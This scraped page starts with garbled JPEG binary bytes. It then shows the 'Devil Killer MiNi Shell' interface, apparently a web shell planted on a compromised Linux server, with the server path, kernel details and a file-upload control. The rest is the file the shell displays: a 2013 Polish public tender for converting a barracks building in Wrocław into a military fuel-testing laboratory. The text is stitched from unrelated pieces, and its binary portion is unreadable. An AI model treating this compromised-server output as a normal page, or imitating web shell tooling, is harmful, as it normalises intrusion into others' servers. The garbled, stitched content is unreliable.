JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130517/194278-N-2013.html

<p class="kh_header"><b>Wrocław: Wykonanie przebudowy budynku nr 191 na laboratorium MPS w kompleksie koszarowym przy ul. Granicznej 13 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 194278 - 2013; data zamieszczenia: 17.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 071 765 68 42, faks 071 765 68 44, 765-68-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie przebudowy budynku nr 191 na laboratorium MPS w kompleksie koszarowym przy ul. Granicznej 13 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
1. Stan istniejący.
Budynek wybudowany w 1978 r. jako domek startowy, w technologii tradycyjnej, murowanej, ze stropodachem żelbetowym płaskim. Fundamenty budynku betonowe w postaci ław fundamentowych. Budunek nie podpiwniczony. Ściany nośne zewnętrzne gr. 40 cm, działowe 25 cm. Ściany konstrukcyjne murowane z cegieł pełnych o układzie podłużnym ze środkową ścianą nośną biegnącą w jego osi przez całą długość budynku. W środku długości budynek rozdzielony jest dylatacją, która powstała w wyniku rozbudowy. W części dobudowanej widoczne są ukośne pęknięcia od stropu aż do posadzki. Stan pęknięcia świadczy, że proces osiadania zakończył się i fundament jest w tym miejscu już ustabilizowany. Na ścianach zewnętrznych widoczne są spękania w okolicy nadproży okiennych  oraz na styku płyt stropodachowych ze ścianami zewnętrznymi, które są najprawdopodobniej pochodzenia termicznego. Płyty stropowe nie wykazują pęknięć oraz oznak klawiszowania. Budynek zasilany jest w wodę poprzez przyłącze wodociągowe z rur stalowych o średnicy DN 32. Przyłącze wprowadzone  jest do pomieszczenia węzła cieplnego. Na głównym przewodzie zasilającym zabudowany jest wodomierz z zaworem odcinającym. W pobliżu budynku na lokalnej sieci wodociągowej zabudowane są hydranty ppoż. DN 80. Budynek posiada przyłącze sanitarne włączone do kanału sanitarnego ks 200. Średnica przykanalika o długości 25 m wynosi DN 150. Przyłącze włączone jest poprzez studzienkę do sieci przebiegającej po jego południowo-zachodniej stronie. Budynek posiada 3 przykanaliki kanalizacji deszczowej. Średnice przykanalików wynoszą DN 150 i  są włączone do kanału  przebiegającego wzdłuż budynku. Przed budynkiem jest plac betonowy o wymiarach ok. 16x11,5 m z odwodnieniem całej powierzchni. Centralnie na placu znajduje się wpust drogowy. Istniejący kanał deszczowy kd800 jest mocno zanieczyszczony mułem i niedrożny w prawie 50 %. Do budynku doprowadzone jest przyłącze cieplne w technologii z rur preizolowanych. Przewody przyłącza wprowadzane są bezpośrednio do pomieszczenia węzła cieplnego. 

2.  Zakres rzeczowy przedmiotu zamówienia
Dotychczas laboratorium MPS funkcjonowało w innym  budynku kompleksu lotniskowego. Z uwagi na przekazanie  poza resort ON terenu z dotychczasowym budynkiem laboratorium, funkcją budynku przeniesiono do budynku nr 191. W laboratorium badane będą próbki paliwa lotniczego F-34, oleju napędowego oraz benzyny bezołowiowej Pb95 i innych produktów naftowych jak materiały pędne i smary. Źródłem pochodzenia prób ww. paliw i produktów naftowych są jednostki podległe 2 Wojskowemu Oddziałowi Gospodarczemu. Olej napędowy i benzyna przywożone będą do laboratorium samochodami w butelkach szklanych. Nie wyklucza się sporadycznego dowozu paliwa w kanistrach 20 litrowych. Materiały pędne i smary takie jak oleje silnikowe, hydrauliczne, płyny do chłodnic i smary samochodowe także dowożone będą w butelkach szklanych. Paliwo lotnicze pobierane będzie do badania bezpośrednio z cystern samochodowych podjeżdżających na plac postojowy przy budynku laboratorium. Próby pobierane będą do butelek szklanych. Paliwa przed badaniem mogą być krótko składowane w pomieszczeniu na zlewki a kontrpróby od razu przekazywane do pomieszczenia kontrprób. Dziennie pod budynek laboratorium podjeżdżać będą 2 do 3 cystern samochodowych o pojemności do 21.000  litrów.  W związku z dojazdem do budynku laboratorium różnych pojazdów, należy wykonać  odcinek drogi dojazdowej z placem manewrowym, plac postojowy przed  budynkiem nr 191 i dojście dla pieszych/chodnik. W laboratorium wykonywany będzie  podstawowy zakres badań jak: temperatura zapłonu, zawartość wody, zawartość zanieczyszczeń, gęstość, lepkość kinematyczna 
i destylacja oraz  próbki materiałów pędnych i smarów. Podczas działalności powstawać będą odpady jak filtry paliwowe, czyściwo, sorbent, paliwa przepracowane przechowywane w zamykanych pojemnikach stalowych.   

Parametry techniczne budynku.
- Powierzchnia zabudowy - 282,80 m2 
- Powierzchnia użytkowa - 220,81 m2 
- Kubatura - 989,70 m3 
- Pow. nawierzchni placu betonowego - 416 m2 
- Pow. chodników 194 m2 .

3. Zakres robót.
W zakresie robót ogólnobudowlanych
-	Rozbiórki, demontaże, wyburzenia i przebicia otworów 
-	Roboty konstrukcyjne 
-	Roboty murowe 
-	Stolarka okienna i drzwiowa 
-	Podłoża, posadzki, izolacje, dylatacje    
-	Tynki, okładziny, malowanie 
-	Roboty dachowe 
-	Elewacja - ocieplenie ścian, elementy zewnętrzne 
-	Zieleń.
-	Roboty drogowe. 

W ramach robót drogowych należy wykonać nawierzchnie: 
-	komunikacji pieszej
-	dojazdowa/manewrowa
-	rejonu pobierania paliwa do badań.

W ramach branży sanitarnej:
-	Przyłącze wodociągowe.
-	Przyłącze kanalizacji sanitarnej.
-	Przyłącze kanalizacji deszczowej.
-	Przyłącze c.o.
-	Instalacja wody zimnej. 
-	Węzeł cieplny i instalacja ciepłej wody. 
-	Instalacja kanalizacji sanitarnej.
-	Instalacja kanalizacji deszczowej.
-	Instalacja centralnego ogrzewania.
-	Instalacja wentylacyjna ogólna i awaryjna.
-	Instalacja butlowa propan- butan.

W ramach branży elektrycznej:
-	WLZ i rozdzielnice 
-	Instalacja oświetlenia podstawowego .
-	Instalacja oświetlenia awaryjnego - ewakuacyjnego
-	Instalacja zasilania gniazd wtyczkowych  1 i 3 fazowych 
-	 Instalacje zasilania urządzeń systemów alarmowych .
-	Instalacja zasilania gniazd wtyczkowych dedykowanych do zasilania urządzeń komputerowych  
-	Instalacja zasilania wentylacji 
-	Instalacja zasilania urządzeń technologii laboratorium  
-	Instalacja zasilania węzła cieplnego 
-	Instalacja odgromowa 
-	Instalacja połączeń wyrównawczych 
-	Ochrona od porażeń 
-	Ochrona przed przepięciami 
-	Instalacja oświetlenia terenu 
-	Instalacja sygnalizacji napełnienia separatora- przyłącz kanalizacji  sanitarnej 
-	Instalacja Sygnalizacji napełniania separatora - przyłącz kanalizacji   deszczowej 
-	Demontaże 
-	Kanalizacja teletechniczna 
-	System Sygnalizacji Włamania i Napadu  
-	Zasilanie podstawowe i awaryjne systemu alarmowego 
-	System Sygnalizacji Pożaru 
-	Zasilanie urządzeń 
-	Instalacja okablowania strukturalnego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.62.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie 60.870,00 zł, do upływu terminu wyznaczonego na składanie ofert, wyłącznie przez Wykonawców biorących udział w II etapie postępowania. Szczegółowe informacje dotyczące wadium zostaną zawarte w Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie usług ochrony osób i mienia, realizowanych w formie zabezpieczenia technicznego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać doświadczenie w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, że wykonał:
a) co najmniej jedną przebudowę lub remont obiektu o kubaturze nie mniejszej jak 1000 m3
oraz 
b) co najmniej jeden  remont placów postojowych/ manewrowych i chodników o powierzchni nie mniejszej niż 500 m2.
W celu oceny spełnienia przez Wykonawcę ww.  warunków załączy wykaz robót budowlanych wykonywanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających , czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone (oryginał lub kopia dokumentu poświadczona za zgodność z oryginałem przez Wykonawcę) - Formularz Nr 3 
   
Dowodem, o którym mowa powyżej jest poświadczenie lub inny dokument, jeżeli
 z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać w/w poświadczenia. 
Wykonawca, w miejsce w/w poświadczeń, może przedkładać dokumenty potwierdzające należyte wykonanie roboty, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane 
(Dz. U. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca musi wykazać, że dysponuje kierownikiem budowy oraz kierownikami robót, którzy posiadają uprawnienia i należą do właściwej izby samorządu zawodowego:
a)	kierownik budowy - w zakresie konstrukcyjno - budowlanym - bez ograniczeń. Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz.1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, spełniają ww. warunek;
b)	kierownik robót w zakresie konstrukcyjno - budowlanym w specjalności drogowej - bez ograniczeń. Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, spełniają ww. warunek.
c)	kierownik robót instalacyjnych w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń. Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz. 1623 
z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, spełniają ww. warunek.
d)	kierownik robót instalacyjnych w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - bez ograniczeń. Osoby, które przed dniem wejścia w życie ustawy tj. 1 stycznia 1995 r. (ustawa z dnia 7 lipca 1994 r. Prawo budowlane - tekst jednolity Dz. U. z 2010 r. Nr 243 poz.1623 z późniejszymi zmianami - art. 104), uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, spełniają ww. warunek.
2. Wykonawca musi wykazać, ze dysponuje pełnomocnikiem ochrony
przeszkolonego w zakresie informacji niejawnych przez Służby Kontrwywiadu Wojskowego lub Agencję Bezpieczeństwa Wewnętrznego. W celu wykazania spełnienia przez Wykonawcę ww. warunku załączy do oferty stosowne oświadczenie.
3. Wykonawca musi wykazać, ze dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia w zakresie wykonania instalacji (SSWiN i KD), którzy  muszą posiadać licencje techniczne:
a)   pracownicy kierującymi robotami - licencje techniczne II stopnia,
b)   pracownicy wykonujący roboty - licencje techniczne I stopnia.

Pracownicy firmy, mający dostęp do informacji niejawnych o klauzuli Zastrzeżone, realizujący zadanie w zakresie okablowania strukturalnego, System Sygnalizacji Włamania i Napadu (SSWiN), kontroli dostępu (KD), systemu alarmu pożaru (SAP) i telewizji obserwacyjnej (CCTV) muszą posiadać upoważnienie do dostępu informacji niejawnych o klauzuli Zastrzeżone wydane przez kierownika jednostki organizacyjnej, lub aktualne poświadczenie bezpieczeństwa osobowego o klauzuli Zastrzeżone lub wyższej, oraz aktualne zaświadczenie o odbyciu przeszkolenia w zakresie ochrony informacji niejawnych (ważne 5 lat). 
W celu oceny spełnienia przez Wykonawcę ww. warunków wykonawca załączy wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami (oryginał podpisany przez Wykonawcę) - Formularz nr 4</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać środki obrotowe lub zdolność kredytową, na kwotę nie mniejszą niż 1.500.000,00 zł (brutto).
W celu oceny spełnienia przez Wykonawcę warunków ww. warunku załączy informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (oryginał lub kopia dokumentu poświadczona za zgodność z oryginałem przez Wykonawcę)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. informacje ogólne o wykonawcy - Formularz Nr 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
